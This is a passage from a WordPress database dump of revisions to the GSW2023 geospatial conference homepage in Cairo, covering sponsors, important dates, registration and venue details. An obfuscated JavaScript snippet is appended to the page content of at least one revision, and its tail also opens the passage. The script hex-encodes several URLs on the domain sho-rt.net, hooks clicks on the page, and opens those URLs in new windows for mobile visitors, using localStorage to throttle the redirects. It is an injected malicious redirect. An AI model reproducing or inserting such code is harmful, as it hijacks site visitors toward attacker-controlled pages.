_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:51:46','2023-04-02 01:51:46','',3066,'https://gsw2023.com/?p=3993',0,'revision','',0),
(3994,1,'2023-04-02 01:52:28','2023-04-02 01:52:28','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400333268{margin-top: 110px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:52:28','2023-04-02 01:52:28','',3066,'https://gsw2023.com/?p=3994',0,'revision','',0),
(3995,1,'2023-04-02 01:52:57','2023-04-02 01:52:57','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400372852{margin-top: 120px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400301732{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400344244{margin-top: 95px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT 